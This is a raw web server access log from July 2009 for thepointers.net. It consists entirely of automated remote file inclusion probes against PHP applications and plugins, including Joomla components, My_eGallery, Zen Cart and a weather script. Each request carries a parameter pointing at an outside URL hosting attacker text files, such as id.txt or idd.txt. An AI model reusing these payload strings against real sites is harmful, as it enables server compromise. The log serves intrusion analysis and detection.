222.122.6.62 - - [05/Jul/2009:05:01:33 -0700] "GET /logs/access_080925.log%20/index.php?openfile=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
222.122.6.62 - - [05/Jul/2009:05:01:33 -0700] "GET /logs/index.php?openfile=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
222.122.6.62 - - [05/Jul/2009:05:01:34 -0700] "GET /index.php?openfile=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:02:51 -0700] "GET /logs/access.log/?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:02:51 -0700] "GET /?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:02:51 -0700] "GET /logs/?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.thepointers.net"
218.234.21.178 - - [05/Jul/2009:05:03:38 -0700] "GET /logs/access.log/!rfi2%20/modules/My_eGallery/public/displayCategory.php?basepath=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
218.234.21.178 - - [05/Jul/2009:05:03:38 -0700] "GET /!rfi2%20/modules/My_eGallery/public/displayCategory.php?basepath=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
218.234.21.178 - - [05/Jul/2009:05:03:38 -0700] "GET /logs/!rfi2%20/modules/My_eGallery/public/displayCategory.php?basepath=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:04:04 -0700] "GET /logs/access.log/?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:04:04 -0700] "GET /?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:04:05 -0700] "GET /logs/?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.thepointers.net"
80.237.155.83 - - [05/Jul/2009:05:07:20 -0700] "GET /logs/access_090112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
80.237.155.83 - - [05/Jul/2009:05:07:20 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:07:21 -0700] "GET /logs/access.log/?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:07:21 -0700] "GET /?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:07:21 -0700] "GET /logs/?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:08:07 -0700] "GET /logs/access.log/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:08:07 -0700] "GET /index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:08:07 -0700] "GET /logs/index.php?redir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
122.201.81.6 - - [05/Jul/2009:05:10:20 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
122.201.81.6 - - [05/Jul/2009:05:10:20 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
122.201.81.6 - - [05/Jul/2009:05:10:20 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.dbmoptics.com/glossary///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
121.124.127.34 - - [05/Jul/2009:05:10:59 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
121.124.127.34 - - [05/Jul/2009:05:10:59 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
121.124.127.34 - - [05/Jul/2009:05:10:59 -0700] "GET /logs/access_080925.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:11:56 -0700] "GET /logs/include/write.php?dir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:11:57 -0700] "GET /logs/access.log/include/write.php?dir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:11:57 -0700] "GET /include/write.php?dir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:12:14 -0700] "GET /logs/access_081222.log/include/write.php?dir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.34.78.110 - - [05/Jul/2009:05:15:49 -0700] "GET /errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
195.34.78.110 - - [05/Jul/2009:05:15:49 -0700] "GET /logs/access.log/errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
195.34.78.110 - - [05/Jul/2009:05:15:49 -0700] "GET /logs/errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:15:58 -0700] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:15:58 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:15:59 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
195.34.78.110 - - [05/Jul/2009:05:16:04 -0700] "GET /errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
195.34.78.110 - - [05/Jul/2009:05:16:04 -0700] "GET /logs/errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
195.34.78.110 - - [05/Jul/2009:05:16:04 -0700] "GET /logs/access.log/errors.php?error=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:16:25 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:16:25 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:16:25 -0700] "GET /phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
218.158.98.196 - - [05/Jul/2009:05:16:44 -0700] "GET /logs/access_081222.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.158.98.196 - - [05/Jul/2009:05:16:45 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.158.98.196 - - [05/Jul/2009:05:16:46 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:17:39 -0700] "GET /phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:17:43 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:17:43 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:17:47 -0700] "GET /logs/components/com_flyspray/startdown.php?file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:17:48 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:17:50 -0700] "GET /logs/access_090128.log/components/com_flyspray/startdown.php?file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:19:00 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:19:00 -0700] "GET /phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:19:04 -0700] "GET /logs/access_080925.log%20%20/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
218.158.98.196 - - [05/Jul/2009:05:23:50 -0700] "GET /logs/access_080925.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
70.85.213.106 - - [05/Jul/2009:05:25:48 -0700] "GET /logs/access_081222.log%20%20/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:26:01 -0700] "GET /logs/access_080925.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:26:01 -0700] "GET /logs/access_080925.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:26:01 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:26:01 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:26:02 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:26:02 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:29:06 -0700] "GET /logs/access_080925.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:29:07 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:29:07 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
211.245.23.158 - - [05/Jul/2009:05:29:15 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.245.23.158 - - [05/Jul/2009:05:29:15 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.245.23.158 - - [05/Jul/2009:05:29:15 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.245.23.158 - - [05/Jul/2009:05:29:16 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.245.23.158 - - [05/Jul/2009:05:29:16 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.245.23.158 - - [05/Jul/2009:05:29:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
59.125.5.1 - - [05/Jul/2009:05:35:55 -0700] "GET /logs/access_080925.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tomato.pooding.com/lib/weblog/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
59.125.5.1 - - [05/Jul/2009:05:35:56 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tomato.pooding.com/lib/weblog/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
59.125.5.1 - - [05/Jul/2009:05:35:56 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tomato.pooding.com/lib/weblog/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
211.230.156.161 - - [05/Jul/2009:05:36:14 -0700] "GET /logs/access.log/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.230.156.161 - - [05/Jul/2009:05:36:14 -0700] "GET /logs/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
211.230.156.161 - - [05/Jul/2009:05:36:14 -0700] "GET /?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
211.230.156.161 - - [05/Jul/2009:05:36:23 -0700] "GET /?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.thepointers.net"
211.230.156.161 - - [05/Jul/2009:05:36:23 -0700] "GET /logs/access.log/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.230.156.161 - - [05/Jul/2009:05:36:23 -0700] "GET /logs/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.thepointers.net"
59.125.5.1 - - [05/Jul/2009:05:37:35 -0700] "GET /logs/access_090112.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tomato.pooding.com/lib/weblog/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
59.125.5.1 - - [05/Jul/2009:05:40:30 -0700] "GET /logs/access_090112.log%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tomato.pooding.com/lib/weblog/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
61.100.186.87 - - [05/Jul/2009:05:40:58 -0700] "GET /home.php?content=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.100.186.87 - - [05/Jul/2009:05:40:58 -0700] "GET /logs/home.php?content=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.100.186.87 - - [05/Jul/2009:05:40:58 -0700] "GET /logs/access_090112.log%20%20/home.php?content=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.100.186.87 - - [05/Jul/2009:05:40:59 -0700] "GET /home.php?content=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.100.186.87 - - [05/Jul/2009:05:40:59 -0700] "GET /logs/home.php?content=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.100.186.87 - - [05/Jul/2009:05:41:00 -0700] "GET /logs/access_090409.log%20%20/home.php?content=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.100.186.87 - - [05/Jul/2009:05:41:00 -0700] "GET /logs/access_090112.log%20%20/home.php?content=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
61.100.186.87 - - [05/Jul/2009:05:41:02 -0700] "GET /logs/access_090409.log%20%20/home.php?content=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:44:04 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:44:04 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 780 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:44:04 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 2375 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:44:05 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:44:06 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 780 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:44:06 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 2375 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:44:06 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:44:06 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 780 "-" "libwww-perl/5.805" "www.thepointers.net"
204.9.247.53 - - [05/Jul/2009:05:44:07 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 2375 "-" "libwww-perl/5.805" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:53:49 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:53:49 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:54:57 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:54:58 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:54:58 -0700] "GET /logs/access_081222.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
94.229.66.202 - - [05/Jul/2009:05:55:37 -0700] "GET /logs/access.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:05:59:16 -0700] "GET /index.php?body=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
83.98.209.71 - - [05/Jul/2009:05:59:16 -0700] "GET /logs/index.php?body=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
83.98.209.71 - - [05/Jul/2009:05:59:16 -0700] "GET /logs/access.log%20%20/index.php?body=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:01:51 -0700] "GET /logs/access.log/index.php?body=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:01:51 -0700] "GET /index.php?body=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
83.98.209.71 - - [05/Jul/2009:06:01:51 -0700] "GET /logs/index.php?body=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
87.229.45.106 - - [05/Jul/2009:06:02:13 -0700] "GET /logs/access_081222.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
87.229.45.106 - - [05/Jul/2009:06:02:13 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
87.229.45.106 - - [05/Jul/2009:06:02:13 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
87.229.45.106 - - [05/Jul/2009:06:02:13 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
87.229.45.106 - - [05/Jul/2009:06:07:01 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
87.229.45.106 - - [05/Jul/2009:06:07:01 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
87.229.45.106 - - [05/Jul/2009:06:07:01 -0700] "GET /logs/access_081222.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
87.229.45.106 - - [05/Jul/2009:06:10:57 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
87.229.45.106 - - [05/Jul/2009:06:10:57 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
87.229.45.106 - - [05/Jul/2009:06:10:57 -0700] "GET /logs/access.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
